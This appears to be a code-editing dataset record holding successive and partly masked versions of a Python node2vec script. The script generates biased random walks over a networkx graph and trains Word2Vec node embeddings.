sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]['weight']) else: unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted( G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [(float(v) / norm_const) for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges def alias_setup(probs): K = len(probs) q = np.zeros(K) J = np.zeros(K, dtype=np.int) smaller = [] larger = [] for kk, prob in enumerate(probs): q[kk] = K * prob if q[kk] > 1.0: larger.append(kk) else: smaller.append(kk) while len(smaller) > 0 and len(larger) > 0: small = smaller.pop() large = larger.pop() J[small] = large q[large] = q[small] + q[large] - 1 if q[large] < 1.0: smaller.append(large) else: larger.append(large) return J, q def alias_draw(J, q): K = len(J) kk = int(np.floor(np.random.rand() * K)) if np.random.rand() < q[kk]: return kk else: return J[kk] def parse_args(): parser = argparse.ArgumentParser(description='Run node2vec.') parser.add_argument('--input', nargs='?', default= './data/Wiki_edgelist.txt', help='Input graph path') parser.add_argument('--output', nargs='?', default= 'emb/node2vec_wiki.emb', help='Embeddings path') parser.add_argument('--label_file', nargs='?', default= 'data/wiki_labels.txt', help='Labels path') parser.add_argument('--dimensions', type=int, default=128, help= 'Number of dimensions. Default is 128.') parser.add_argument('--walk-length', type=int, default=80, help= 'Length of walk per source. Default is 80.') parser.add_argument('--num-walks', type=int, default=20, help= 'Number of walks per source. Default is 10.') parser.add_argument('--window-size', type=int, default=10, help= 'Context size for optimization. Default is 10.') parser.add_argument('--iter', default=2, type=int, help= 'Number of epochs in SGD') parser.add_argument('--workers', type=int, default=8, help= 'Number of parallel workers. Default is 8.') parser.add_argument('--p', type=float, default=1, help= 'Return hyperparameter. Default is 1.') parser.add_argument('--q', type=float, default=1, help= 'Inout hyperparameter. Default is 1.') parser.add_argument('--weighted', dest='weighted', action='store_true', help='Boolean specifying (un)weighted. Default is unweighted.') parser.add_argument('--unweighted', dest='unweighted', action='store_false' ) parser.set_defaults(weighted=False) parser.add_argument('--directed', dest='directed', action='store_true', help='Graph is (un)directed. Default is undirected.') parser.add_argument('--undirected', dest='undirected', action='store_false' ) parser.set_defaults(directed=False) return parser.parse_args() def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float),), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx. DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G def learning_walks(walks): walks = [list(map(str, walk)) for walk in walks] model = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers, iter=args.iter) model.wv.save_word2vec_format(args.output) return model def main(args): nx_G = read_graph() G = node2vec_walk(nx_G, args.directed, args.p, args.q) G.preprocess_transition_probs() walks = G.simulate_walks(args.num_walks, args.walk_length) model = learning_walks(walks) _embeddings = {} for v in nx_G.nodes(): _embeddings[str(v)] = model.wv[str(v)] plot_embeddings(_embeddings, args.label_file) if __name__ == '__main__': args = parse_args() main(args) <|reserved_special_token_1|> import numpy as np import random import argparse import networkx as nx from gensim.models import Word2Vec from utils import read_node_label, plot_embeddings class node2vec_walk(): def __init__(self, nx_G, is_directed, p, q): self.G = nx_G self.is_directed = is_directed self.p = p self.q = q def node2vec_walk(self, walk_length, start_node): G = self.G alias_nodes = self.alias_nodes alias_edges = self.alias_edges walk = [start_node] while len(walk) < walk_length: curr = walk[-1] cur_nbrs = sorted(G.neighbors(curr)) if len(cur_nbrs) > 0: if len(walk) == 1: walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])]) else: prev = walk[-2] next = cur_nbrs[alias_draw(alias_edges[(prev, curr)][0], alias_edges[(prev, curr)][1])] walk.append(next) else: break return walk def simulate_walks(self, num_walks, walk_length): G = self.G walks = [] nodes = list(G.nodes()) print("Walk iteration...") for walk_iter in range(num_walks): print(f"{walk_iter + 1}/{num_walks}") random.shuffle(nodes) for node in nodes: walks.append(self.node2vec_walk(walk_length, node)) return walks def get_alias_edge(self, src, dst): G = self.G p = self.p q = self.q unnormalized_probs = [] for dst_nbr in sorted(G.neighbors(dst)): if dst_nbr == src: unnormalized_probs.append(G[dst][dst_nbr]["weight"] / p) elif G.has_edge(dst_nbr, src): unnormalized_probs.append(G[dst][dst_nbr]["weight"]) else: unnormalized_probs.append(G[dst][dst_nbr]["weight"] / q) norm_cost = sum(unnormalized_probs) normalized_probs = [float(v) / norm_cost for v in unnormalized_probs] return alias_setup(normalized_probs) def preprocess_transition_probs(self): # 预处理转移概率 G = self.G is_directed = self.is_directed alias_nodes = {} for node in G.nodes(): unnormalized_probs = [G[node][nbr]["weight"] for nbr in sorted(G.neighbors(node))] norm_const = sum(unnormalized_probs) normalized_probs = [float(v) / norm_const for v in unnormalized_probs] alias_nodes[node] = alias_setup(normalized_probs) alias_edges = {} if is_directed: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) else: for edge in G.edges(): alias_edges[edge] = self.get_alias_edge(edge[0], edge[1]) alias_edges[(edge[1], edge[0])] = self.get_alias_edge(edge[1], edge[0]) self.alias_nodes = alias_nodes self.alias_edges = alias_edges def alias_setup(probs): K = len(probs) q = np.zeros(K) J = np.zeros(K, dtype=np.int) smaller = [] larger = [] for kk, prob in enumerate(probs): q[kk] = K * prob # 记录小于均匀分布概率的Index if q[kk] > 1.0: larger.append(kk) else: smaller.append(kk) while len(smaller) > 0 and len(larger) > 0: small = smaller.pop() large = larger.pop() # 记录index J[small] = large # 将small的补充满1后,算出剩余large的概率 q[large] = q[small] + q[large] - 1 # 若q[large]不等于1,则继续放入smaller和larger的数组中进行迭代 if q[large] < 1.0: smaller.append(large) else: larger.append(large) return J, q def alias_draw(J, q): # 非均匀分布进行采样 K = len(J) kk = int(np.floor(np.random.rand() * K)) if np.random.rand() < q[kk]: return kk else: return J[kk] def parse_args(): parser = argparse.ArgumentParser(description="Run node2vec.") parser.add_argument('--input', nargs='?', default='./data/Wiki_edgelist.txt', help='Input graph path') parser.add_argument('--output', nargs='?', default='emb/node2vec_wiki.emb', help='Embeddings path') parser.add_argument('--label_file', nargs='?', default='data/wiki_labels.txt', help='Labels path') parser.add_argument('--dimensions', type=int, default=128, help='Number of dimensions. Default is 128.') parser.add_argument('--walk-length', type=int, default=80, help='Length of walk per source. Default is 80.') parser.add_argument('--num-walks', type=int, default=20, help='Number of walks per source. Default is 10.') parser.add_argument('--window-size', type=int, default=10, help='Context size for optimization. Default is 10.') parser.add_argument('--iter', default=2, type=int, help='Number of epochs in SGD') parser.add_argument('--workers', type=int, default=8, help='Number of parallel workers. Default is 8.') parser.add_argument('--p', type=float, default=1, help='Return hyperparameter. Default is 1.') parser.add_argument('--q', type=float, default=1, help='Inout hyperparameter. Default is 1.') parser.add_argument('--weighted', dest='weighted', action='store_true', help='Boolean specifying (un)weighted. Default is unweighted.') parser.add_argument('--unweighted', dest='unweighted', action='store_false') parser.set_defaults(weighted=False) parser.add_argument('--directed', dest='directed', action='store_true', help='Graph is (un)directed. Default is undirected.') parser.add_argument('--undirected', dest='undirected', action='store_false') parser.set_defaults(directed=False) return parser.parse_args() def read_graph(): if args.weighted: G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float), ), create_using=nx.DiGraph) else: G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.DiGraph()) for edge in G.edges(): G[edge[0]][edge[1]]['weight'] = 1 if not args.directed: G = G.to_undirected() return G def learning_walks(walks): walks = [list(map(str, walk)) for walk in walks] model = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers, iter=args.iter) model.wv.save_word2vec_format(args.output) return model def main(args): nx_G = read_graph() G = node2vec_walk(nx_G, args.directed, args.p, args.q) G.preprocess_transition_probs() walks = G.simulate_walks(args.num_walks, args.walk_length) model = learning_walks(walks) _embeddings = {} for v in nx_G.nodes(): _embeddings[str(v)] = model.wv[str(v)] plot_embeddings(_embeddings, args.label_file) if __name__ == "__main__": args = parse_args() main(args)
flexible
{ "blob_id": "fc2748d766ebce8c9577f1eebc8435e2aa58ae25", "index": 8605, "step-1": "<mask token>\n\n\nclass node2vec_walk:\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0],\n alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[prev, curr][0],\n alias_edges[prev, curr][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n print('Walk iteration...')\n for walk_iter in range(num_walks):\n print(f'{walk_iter + 1}/{num_walks}')\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n G = self.G\n is_directed = self.is_directed\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted(\n G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_const) for v in\n unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n alias_edges = {}\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1],\n edge[0])\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\n<mask token>\n\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight',\n float),), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.\n DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n if not args.directed:\n G = G.to_undirected()\n return G\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass node2vec_walk:\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0],\n alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[prev, curr][0],\n alias_edges[prev, curr][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n print('Walk iteration...')\n for walk_iter in range(num_walks):\n print(f'{walk_iter + 1}/{num_walks}')\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n G = self.G\n is_directed = self.is_directed\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted(\n G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_const) for v in\n unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n alias_edges = {}\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1],\n edge[0])\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\n<mask token>\n\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight',\n float),), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.\n DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n if not args.directed:\n G = G.to_undirected()\n return G\n\n\n<mask token>\n\n\ndef main(args):\n nx_G = read_graph()\n G = node2vec_walk(nx_G, args.directed, args.p, args.q)\n G.preprocess_transition_probs()\n walks = G.simulate_walks(args.num_walks, args.walk_length)\n model = learning_walks(walks)\n _embeddings = {}\n for v in nx_G.nodes():\n _embeddings[str(v)] = model.wv[str(v)]\n plot_embeddings(_embeddings, args.label_file)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass node2vec_walk:\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0],\n alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[prev, curr][0],\n alias_edges[prev, curr][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n print('Walk iteration...')\n for walk_iter in range(num_walks):\n print(f'{walk_iter + 1}/{num_walks}')\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n G = self.G\n is_directed = self.is_directed\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted(\n G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_const) for v in\n unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n alias_edges = {}\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1],\n edge[0])\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\ndef alias_setup(probs):\n K = len(probs)\n q = np.zeros(K)\n J = np.zeros(K, dtype=np.int)\n smaller = []\n larger = []\n for kk, prob in enumerate(probs):\n q[kk] = K * prob\n if q[kk] > 1.0:\n larger.append(kk)\n else:\n smaller.append(kk)\n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n J[small] = large\n q[large] = q[small] + q[large] - 1\n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n return J, q\n\n\ndef alias_draw(J, q):\n K = len(J)\n kk = int(np.floor(np.random.rand() * K))\n if np.random.rand() < q[kk]:\n return kk\n else:\n return J[kk]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Run node2vec.')\n parser.add_argument('--input', nargs='?', default=\n './data/Wiki_edgelist.txt', help='Input graph path')\n parser.add_argument('--output', nargs='?', default=\n 'emb/node2vec_wiki.emb', help='Embeddings path')\n parser.add_argument('--label_file', nargs='?', default=\n 'data/wiki_labels.txt', help='Labels path')\n parser.add_argument('--dimensions', type=int, default=128, help=\n 'Number of dimensions. Default is 128.')\n parser.add_argument('--walk-length', type=int, default=80, help=\n 'Length of walk per source. Default is 80.')\n parser.add_argument('--num-walks', type=int, default=20, help=\n 'Number of walks per source. Default is 10.')\n parser.add_argument('--window-size', type=int, default=10, help=\n 'Context size for optimization. Default is 10.')\n parser.add_argument('--iter', default=2, type=int, help=\n 'Number of epochs in SGD')\n parser.add_argument('--workers', type=int, default=8, help=\n 'Number of parallel workers. Default is 8.')\n parser.add_argument('--p', type=float, default=1, help=\n 'Return hyperparameter. Default is 1.')\n parser.add_argument('--q', type=float, default=1, help=\n 'Inout hyperparameter. Default is 1.')\n parser.add_argument('--weighted', dest='weighted', action='store_true',\n help='Boolean specifying (un)weighted. Default is unweighted.')\n parser.add_argument('--unweighted', dest='unweighted', action='store_false'\n )\n parser.set_defaults(weighted=False)\n parser.add_argument('--directed', dest='directed', action='store_true',\n help='Graph is (un)directed. Default is undirected.')\n parser.add_argument('--undirected', dest='undirected', action='store_false'\n )\n parser.set_defaults(directed=False)\n return parser.parse_args()\n\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight',\n float),), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.\n DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n if not args.directed:\n G = G.to_undirected()\n return G\n\n\ndef learning_walks(walks):\n walks = [list(map(str, walk)) for walk in walks]\n model = Word2Vec(walks, size=args.dimensions, window=args.window_size,\n min_count=0, sg=1, workers=args.workers, iter=args.iter)\n model.wv.save_word2vec_format(args.output)\n return model\n\n\ndef main(args):\n nx_G = read_graph()\n G = node2vec_walk(nx_G, args.directed, args.p, args.q)\n G.preprocess_transition_probs()\n walks = G.simulate_walks(args.num_walks, args.walk_length)\n model = learning_walks(walks)\n _embeddings = {}\n for v in nx_G.nodes():\n _embeddings[str(v)] = model.wv[str(v)]\n plot_embeddings(_embeddings, args.label_file)\n\n\n<mask token>\n", "step-4": "<mask token>\n\n\nclass node2vec_walk:\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0],\n alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[prev, curr][0],\n alias_edges[prev, curr][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n print('Walk iteration...')\n for walk_iter in range(num_walks):\n print(f'{walk_iter + 1}/{num_walks}')\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr]['weight'])\n else:\n unnormalized_probs.append(G[dst][dst_nbr]['weight'] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_cost) for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n G = self.G\n is_directed = self.is_directed\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr]['weight'] for nbr in sorted(\n G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [(float(v) / norm_const) for v in\n unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n alias_edges = {}\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[edge[1], edge[0]] = self.get_alias_edge(edge[1],\n edge[0])\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\ndef alias_setup(probs):\n K = len(probs)\n q = np.zeros(K)\n J = np.zeros(K, dtype=np.int)\n smaller = []\n larger = []\n for kk, prob in enumerate(probs):\n q[kk] = K * prob\n if q[kk] > 1.0:\n larger.append(kk)\n else:\n smaller.append(kk)\n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n J[small] = large\n q[large] = q[small] + q[large] - 1\n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n return J, q\n\n\ndef alias_draw(J, q):\n K = len(J)\n kk = int(np.floor(np.random.rand() * K))\n if np.random.rand() < q[kk]:\n return kk\n else:\n return J[kk]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Run node2vec.')\n parser.add_argument('--input', nargs='?', default=\n './data/Wiki_edgelist.txt', help='Input graph path')\n parser.add_argument('--output', nargs='?', default=\n 'emb/node2vec_wiki.emb', help='Embeddings path')\n parser.add_argument('--label_file', nargs='?', default=\n 'data/wiki_labels.txt', help='Labels path')\n parser.add_argument('--dimensions', type=int, default=128, help=\n 'Number of dimensions. Default is 128.')\n parser.add_argument('--walk-length', type=int, default=80, help=\n 'Length of walk per source. Default is 80.')\n parser.add_argument('--num-walks', type=int, default=20, help=\n 'Number of walks per source. Default is 10.')\n parser.add_argument('--window-size', type=int, default=10, help=\n 'Context size for optimization. Default is 10.')\n parser.add_argument('--iter', default=2, type=int, help=\n 'Number of epochs in SGD')\n parser.add_argument('--workers', type=int, default=8, help=\n 'Number of parallel workers. Default is 8.')\n parser.add_argument('--p', type=float, default=1, help=\n 'Return hyperparameter. Default is 1.')\n parser.add_argument('--q', type=float, default=1, help=\n 'Inout hyperparameter. Default is 1.')\n parser.add_argument('--weighted', dest='weighted', action='store_true',\n help='Boolean specifying (un)weighted. Default is unweighted.')\n parser.add_argument('--unweighted', dest='unweighted', action='store_false'\n )\n parser.set_defaults(weighted=False)\n parser.add_argument('--directed', dest='directed', action='store_true',\n help='Graph is (un)directed. Default is undirected.')\n parser.add_argument('--undirected', dest='undirected', action='store_false'\n )\n parser.set_defaults(directed=False)\n return parser.parse_args()\n\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight',\n float),), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.\n DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n if not args.directed:\n G = G.to_undirected()\n return G\n\n\ndef learning_walks(walks):\n walks = [list(map(str, walk)) for walk in walks]\n model = Word2Vec(walks, size=args.dimensions, window=args.window_size,\n min_count=0, sg=1, workers=args.workers, iter=args.iter)\n model.wv.save_word2vec_format(args.output)\n return model\n\n\ndef main(args):\n nx_G = read_graph()\n G = node2vec_walk(nx_G, args.directed, args.p, args.q)\n G.preprocess_transition_probs()\n walks = G.simulate_walks(args.num_walks, args.walk_length)\n model = learning_walks(walks)\n _embeddings = {}\n for v in nx_G.nodes():\n _embeddings[str(v)] = model.wv[str(v)]\n plot_embeddings(_embeddings, args.label_file)\n\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n", "step-5": "\n\nimport numpy as np\nimport random\n\nimport argparse\nimport networkx as nx\nfrom gensim.models import Word2Vec\n\nfrom utils import read_node_label, plot_embeddings\n\nclass node2vec_walk():\n\n def __init__(self, nx_G, is_directed, p, q):\n self.G = nx_G\n self.is_directed = is_directed\n self.p = p\n self.q = q\n\n def node2vec_walk(self, walk_length, start_node):\n G = self.G\n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n\n walk = [start_node]\n\n while len(walk) < walk_length:\n curr = walk[-1]\n cur_nbrs = sorted(G.neighbors(curr))\n if len(cur_nbrs) > 0:\n if len(walk) == 1:\n walk.append(cur_nbrs[alias_draw(alias_nodes[curr][0], alias_nodes[curr][1])])\n else:\n prev = walk[-2]\n next = cur_nbrs[alias_draw(alias_edges[(prev, curr)][0], alias_edges[(prev, curr)][1])]\n walk.append(next)\n else:\n break\n return walk\n\n def simulate_walks(self, num_walks, walk_length):\n G = self.G\n walks = []\n nodes = list(G.nodes())\n\n print(\"Walk iteration...\")\n\n for walk_iter in range(num_walks):\n print(f\"{walk_iter + 1}/{num_walks}\")\n random.shuffle(nodes)\n for node in nodes:\n walks.append(self.node2vec_walk(walk_length, node))\n return walks\n\n def get_alias_edge(self, src, dst):\n G = self.G\n p = self.p\n q = self.q\n unnormalized_probs = []\n for dst_nbr in sorted(G.neighbors(dst)):\n if dst_nbr == src:\n unnormalized_probs.append(G[dst][dst_nbr][\"weight\"] / p)\n elif G.has_edge(dst_nbr, src):\n unnormalized_probs.append(G[dst][dst_nbr][\"weight\"])\n else:\n unnormalized_probs.append(G[dst][dst_nbr][\"weight\"] / q)\n norm_cost = sum(unnormalized_probs)\n normalized_probs = [float(v) / norm_cost for v in unnormalized_probs]\n return alias_setup(normalized_probs)\n\n def preprocess_transition_probs(self):\n # 预处理转移概率\n G = self.G\n is_directed = self.is_directed\n\n alias_nodes = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbr][\"weight\"] for nbr in sorted(G.neighbors(node))]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [float(v) / norm_const for v in unnormalized_probs]\n alias_nodes[node] = alias_setup(normalized_probs)\n\n alias_edges = {}\n\n if is_directed:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n else:\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0], edge[1])\n alias_edges[(edge[1], edge[0])] = self.get_alias_edge(edge[1], edge[0])\n\n\n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n\n\n\ndef alias_setup(probs):\n K = len(probs)\n q = np.zeros(K)\n J = np.zeros(K, dtype=np.int)\n\n smaller = []\n larger = []\n for kk, prob in enumerate(probs):\n q[kk] = K * prob\n # 记录小于均匀分布概率的Index\n if q[kk] > 1.0:\n larger.append(kk)\n else:\n smaller.append(kk)\n\n while len(smaller) > 0 and len(larger) > 0:\n small = smaller.pop()\n large = larger.pop()\n\n # 记录index\n J[small] = large\n # 将small的补充满1后,算出剩余large的概率\n q[large] = q[small] + q[large] - 1\n # 若q[large]不等于1,则继续放入smaller和larger的数组中进行迭代\n if q[large] < 1.0:\n smaller.append(large)\n else:\n larger.append(large)\n\n return J, q\n\ndef alias_draw(J, q):\n # 非均匀分布进行采样\n K = len(J)\n\n kk = int(np.floor(np.random.rand() * K))\n if np.random.rand() < q[kk]:\n return kk\n else:\n return J[kk]\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Run node2vec.\")\n parser.add_argument('--input', nargs='?', default='./data/Wiki_edgelist.txt', help='Input graph path')\n parser.add_argument('--output', nargs='?', default='emb/node2vec_wiki.emb', help='Embeddings path')\n parser.add_argument('--label_file', nargs='?', default='data/wiki_labels.txt', help='Labels path')\n parser.add_argument('--dimensions', type=int, default=128, help='Number of dimensions. Default is 128.')\n parser.add_argument('--walk-length', type=int, default=80, help='Length of walk per source. Default is 80.')\n parser.add_argument('--num-walks', type=int, default=20, help='Number of walks per source. Default is 10.')\n parser.add_argument('--window-size', type=int, default=10, help='Context size for optimization. Default is 10.')\n parser.add_argument('--iter', 